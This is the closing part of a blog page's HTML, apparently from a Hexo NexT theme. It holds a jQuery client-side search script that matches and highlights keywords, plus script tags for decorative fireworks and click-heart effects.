    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.search-popup-overlay').click(onPopupClose);
      $('.popup').toggle();
      var $localSearchInput = $('#local-search-input');
      $localSearchInput.attr("autocapitalize", "none");
      $localSearchInput.attr("autocorrect", "off");
      $localSearchInput.focus();
    }

    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';

      // start loading animation
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
          '<div id="search-loading-icon">' +
          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
          '</div>' +
          '</div>')
        .css('overflow', 'hidden');
      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');

      $.ajax({
        url: path,
        dataType: isXml ? "xml" : "json",
        async: true,
        success: function(res) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = isXml ? $("entry", res).map(function() {
            return {
              title: $("title", this).text(),
              content: $("content",this).text(),
              url: $("url" , this).text()
            };
          }).get() : res;
          var input = document.getElementById(search_id);
          var resultContent = document.getElementById(content_id);
          var inputEventFunction = function() {
            var searchText = input.value.trim().toLowerCase();
            var keywords = searchText.split(/[\s\-]+/);
            if (keywords.length > 1) {
              keywords.push(searchText);
            }
            var resultItems = [];
            if (searchText.length > 0) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var hitCount = 0;
                var searchTextCount = 0;
                var title = data.title.trim();
                var titleInLowerCase = title.toLowerCase();
                var content = data.content.trim().replace(/<[^>]+>/g,"");
                var contentInLowerCase = content.toLowerCase();
                var articleUrl = decodeURIComponent(data.url);
                var indexOfTitle = [];
                var indexOfContent = [];
                // only match articles with not empty titles
                if(title != '') {
                  keywords.forEach(function(keyword) {
                    function getIndexByWord(word, text, caseSensitive) {
                      var wordLen = word.length;
                      if (wordLen === 0) {
                        return [];
                      }
                      var startPosition = 0, position = [], index = [];
                      if (!caseSensitive) {
                        text = text.toLowerCase();
                        word = word.toLowerCase();
                      }
                      while ((position = text.indexOf(word, startPosition)) > -1) {
                        index.push({position: position, word: word});
                        startPosition = position + wordLen;
                      }
                      return index;
                    }

                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
                  });
                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
                    isMatch = true;
                    hitCount = indexOfTitle.length + indexOfContent.length;
                  }
                }

                // show search results

                if (isMatch) {
                  // sort index by position of keyword

                  [indexOfTitle, indexOfContent].forEach(function (index) {
                    index.sort(function (itemLeft, itemRight) {
                      if (itemRight.position !== itemLeft.position) {
                        return itemRight.position - itemLeft.position;
                      } else {
                        return itemLeft.word.length - itemRight.word.length;
                      }
                    });
                  });

                  // merge hits into slices

                  function mergeIntoSlice(text, start, end, index) {
                    var item = index[index.length - 1];
                    var position = item.position;
                    var word = item.word;
                    var hits = [];
                    var searchTextCountInSlice = 0;
                    while (position + word.length <= end && index.length != 0) {
                      if (word === searchText) {
                        searchTextCountInSlice++;
                      }
                      hits.push({position: position, length: word.length});
                      var wordEnd = position + word.length;

                      // move to next position of hit

                      index.pop();
                      while (index.length != 0) {
                        item = index[index.length - 1];
                        position = item.position;
                        word = item.word;
                        if (wordEnd > position) {
                          index.pop();
                        } else {
                          break;
                        }
                      }
                    }
                    searchTextCount += searchTextCountInSlice;
                    return {
                      hits: hits,
                      start: start,
                      end: end,
                      searchTextCount: searchTextCountInSlice
                    };
                  }

                  var slicesOfTitle = [];
                  if (indexOfTitle.length != 0) {
                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
                  }

                  var slicesOfContent = [];
                  while (indexOfContent.length != 0) {
                    var item = indexOfContent[indexOfContent.length - 1];
                    var position = item.position;
                    var word = item.word;
                    // cut out 100 characters
                    var start = position - 20;
                    var end = position + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if (end < position + word.length) {
                      end = position + word.length;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
                  }

                  // sort slices in content by search text's count and hits' count

                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                      return sliceRight.hits.length - sliceLeft.hits.length;
                    } else {
                      return sliceLeft.start - sliceRight.start;
                    }
                  });

                  // select top N slices in content

                  var upperBound = parseInt('1');
                  if (upperBound >= 0) {
                    slicesOfContent = slicesOfContent.slice(0, upperBound);
                  }

                  // highlight title and content

                  function highlightKeyword(text, slice) {
                    var result = '';
                    var prevEnd = slice.start;
                    slice.hits.forEach(function (hit) {
                      result += text.substring(prevEnd, hit.position);
                      var end = hit.position + hit.length;
                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                      prevEnd = end;
                    });
                    result += text.substring(prevEnd, slice.end);
                    return result;
                  }

                  var resultItem = '';

                  if (slicesOfTitle.length != 0) {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
                  } else {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
                  }

                  slicesOfContent.forEach(function (slice) {
                    resultItem += "<a href='" + articleUrl + "'>" +
                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
                      "...</p>" + "</a>";
                  });

                  resultItem += "</li>";
                  resultItems.push({
                    item: resultItem,
                    searchTextCount: searchTextCount,
                    hitCount: hitCount,
                    id: resultItems.length
                  });
                }
              })
            };
            if (keywords.length === 1 && keywords[0] === "") {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>'
            } else if (resultItems.length === 0) {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>'
            } else {
              resultItems.sort(function (resultLeft, resultRight) {
                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
                  return resultRight.searchTextCount - resultLeft.searchTextCount;
                } else if (resultLeft.hitCount !== resultRight.hitCount) {
                  return resultRight.hitCount - resultLeft.hitCount;
                } else {
                  return resultRight.id - resultLeft.id;
                }
              });
              var searchResultList = '<ul class=\"search-result-list\">';
              resultItems.forEach(function (result) {
                searchResultList += result.item;
              })
              searchResultList += "</ul>";
              resultContent.innerHTML = searchResultList;
            }
          }

          if ('auto' === 'auto') {
            input.addEventListener('input', inputEventFunction);
          } else {
            $('.search-icon').click(inputEventFunction);
            input.addEventListener('keypress', function (event) {
              if (event.keyCode === 13) {
                inputEventFunction();
              }
            });
          }

          // remove loading animation
          $(".local-search-pop-overlay").remove();
          $('body').css('overflow', '');

          proceedsearch();
        }
      });
    }

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched === false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(onPopupClose);
    $('.popup').click(function(e){
      e.stopPropagation();
    });
    $(document).on('keyup', function (event) {
      var shouldDismissSearchPopup = event.which === 27 &&
        $('.search-popup').is(':visible');
      if (shouldDismissSearchPopup) {
        onPopupClose();
      }
    });
  </script>





  

  

  

  
  

  

  

  



   <canvas class="fireworks" style="position: fixed;left: 0;top: 0;z-index: 1; pointer-events: none;"></canvas> 
   <script type="text/javascript" src="//cdn.bootcss.com/animejs/2.2.0/anime.min.js"></script> 
   <script type="text/javascript" src="/js/src/fireworks.js"></script>

</body>
</html>
<!-- 页面点击小红心 -->
<script type="text/javascript" src="/js/src/clicklove.js"></script>